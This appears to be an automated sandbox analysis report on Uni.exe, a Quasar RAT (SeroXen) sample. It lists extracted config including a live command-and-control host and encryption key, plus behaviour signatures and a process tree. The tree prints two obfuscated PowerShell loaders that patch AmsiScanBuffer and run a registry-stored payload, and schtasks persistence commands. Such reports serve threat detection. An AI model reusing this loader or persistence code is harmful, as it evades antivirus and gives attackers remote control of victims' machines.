Analysis

  • max time kernel
    600s
  • max time network
    601s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 16:02

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    4c2bb0618a6eda615c8001d5a7ccd6c0

  • SHA1

    c88d2c8bfc5906a5cfef78893d1132edcffd71f0

  • SHA256

    abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

  • SHA512

    6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027

  • SSDEEP

    12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

tue-jake.gl.at.ply.gg:29058

Mutex

$Sxr-xPAuDxLNyBmZ7S2WLJ

Attributes
  • encryption_key

    Pw78RUs175dFrKD7lMwH

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    SeroXen

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 13 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1016
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{be01f1de-33b9-4114-bb82-d70d5f7ad57d}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{0eb349d0-ea7d-4a1a-bcd0-8c7422bf74b3}
          2⤵
            PID:4504
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 4504 -s 288
              3⤵
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4588
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:664
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:940
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:512
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1048
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1076
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1208
                        • C:\Windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:2940
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:omHHpgdTiXMl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aZvBHkGxhigjPw,[Parameter(Position=1)][Type]$qBDAgEWYll)$vylXAnALLGT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'eal'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$vylXAnALLGT.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+'ec'+[Char](105)+'alNa'+'m'+'e,'+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+''+','+'Pu'+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aZvBHkGxhigjPw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');$vylXAnALLGT.DefineMethod(''+[Char](73)+''+[Char](110)+'vo'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+','+''+'H'+''+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$qBDAgEWYll,$aZvBHkGxhigjPw).SetImplementationFlags('R'+'u'+''+'n'+'tim'+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ge'+'d'+'');Write-Output $vylXAnALLGT.CreateType();}$TRtBqvTpjMVXa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'em.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+'th'+[Char](111)+'ds');$ihbkpvZSHapRzZ=$TRtBqvTpjMVXa.GetMethod('G'+[Char](101)+''+'t'+'P'+[Char](114)+''+'o'+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zLqdptdTmAGarEoatlZ=omHHpgdTiXMl @([String])([IntPtr]);$nrnmXRgcbirswSbMpLWWbI=omHHpgdTiXMl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PYwzcOkInMm=$TRtBqvTpjMVXa.GetMethod(''+[Char](71)+''+'e'+''+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+'Ha'+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));$LAoWFUmiGIIWWG=$ihbkpvZSHapRzZ.Invoke($Null,@([Object]$PYwzcOkInMm,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$HLrMWSQsJLWdVzYgJ=$ihbkpvZSHapRzZ.Invoke($Null,@([Object]$PYwzcOkInMm,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+''+'l'+''+'P'+'r'+'o'+''+'t'+'ec'+[Char](116)+'')));$JfyEgRU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LAoWFUmiGIIWWG,$zLqdptdTmAGarEoatlZ).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+'dl'+'l'+'');$tcVKrBGgKSWmWVqKt=$ihbkpvZSHapRzZ.Invoke($Null,@([Object]$JfyEgRU,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+'Sc'+'a'+''+[Char](110)+'Buf'+'f'+''+'e'+'r')));$ofBJssVvyl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HLrMWSQsJLWdVzYgJ,$nrnmXRgcbirswSbMpLWWbI).Invoke($tcVKrBGgKSWmWVqKt,[uint32]8,4,[ref]$ofBJssVvyl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tcVKrBGgKSWmWVqKt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HLrMWSQsJLWdVzYgJ,$nrnmXRgcbirswSbMpLWWbI).Invoke($tcVKrBGgKSWmWVqKt,[uint32]8,0x20,[ref]$ofBJssVvyl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2220
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lnqSMoLAdbVn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gWwgDuiRWzISGU,[Parameter(Position=1)][Type]$PvakLvKGlb)$dJPmHnztWtp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+'l'+'ass'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+'s'+''+'s'+''+','+'Au'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$dJPmHnztWtp.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+'N'+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$gWwgDuiRWzISGU).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$dJPmHnztWtp.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+'ByS'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$PvakLvKGlb,$gWwgDuiRWzISGU).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $dJPmHnztWtp.CreateType();}$LXKiTThecjIPP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+'i'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+'od'+'s'+'');$PMprQEOyhBBaHV=$LXKiTThecjIPP.GetMethod('G'+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+'o'+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WSmicDrtOmJjfGWgbEO=lnqSMoLAdbVn @([String])([IntPtr]);$zuKRlHYVRIoPwAbEKMQPsd=lnqSMoLAdbVn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WfNMRYRSLMn=$LXKiTThecjIPP.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+'le'+[Char](72)+'a'+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+'3'+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$oAkirkdGzjdHua=$PMprQEOyhBBaHV.Invoke($Null,@([Object]$WfNMRYRSLMn,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+[Char](105)+'b'+'r'+'ar'+[Char](121)+''+'A'+'')));$ELyDblsOOKJgVhxqR=$PMprQEOyhBBaHV.Invoke($Null,@([Object]$WfNMRYRSLMn,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+'t'+'')));$SGTAPhX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oAkirkdGzjdHua,$WSmicDrtOmJjfGWgbEO).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$dRSQFeXMHinBuhCAL=$PMprQEOyhBBaHV.Invoke($Null,@([Object]$SGTAPhX,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+'e'+''+[Char](114)+'')));$pZlUlaCefs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ELyDblsOOKJgVhxqR,$zuKRlHYVRIoPwAbEKMQPsd).Invoke($dRSQFeXMHinBuhCAL,[uint32]8,4,[ref]$pZlUlaCefs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dRSQFeXMHinBuhCAL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ELyDblsOOKJgVhxqR,$zuKRlHYVRIoPwAbEKMQPsd).Invoke($dRSQFeXMHinBuhCAL,[uint32]8,0x20,[ref]$pZlUlaCefs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+'tage'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4804
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:3960
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                            • Drops file in System32 directory
                            PID:1252
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1312
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1336
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1376
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1404
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1420
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1536
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1564
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2676
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1596
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1680
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1740
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                  • Modifies Internet Explorer settings
                                                  PID:1784
                                                  • C:\Windows\system32\AUDIODG.EXE
                                                    C:\Windows\system32\AUDIODG.EXE 0x300 0x4e0
                                                    2⤵
                                                      PID:4616
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1864
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1892
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        1⤵
                                                          PID:1900
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1944
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1960
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:1500
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2068
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2204
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2360
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2380
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2392
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2516
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2596
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2608
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2620
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2640
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:2748
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3068
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:1116
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3268
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of UnmapMainImage
                                                                                        PID:3408
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                          2⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2400
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:640
                                                                                          • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4996
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                              4⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:2840
                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1908
                                                                                            • C:\Users\Admin\AppData\Local\Temp\6Rs8wA3zbw4c.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\6Rs8wA3zbw4c.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4756
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4756 -s 1948
                                                                                                5⤵
                                                                                                • Program crash
                                                                                                • Checks processor information in registry
                                                                                                • Enumerates system info in registry
                                                                                                PID:1876
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4904
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:976
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3552
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3748
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:3940
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3844
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:448
                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4408
                                                                                                • C:\Windows\System32\svchost.exe
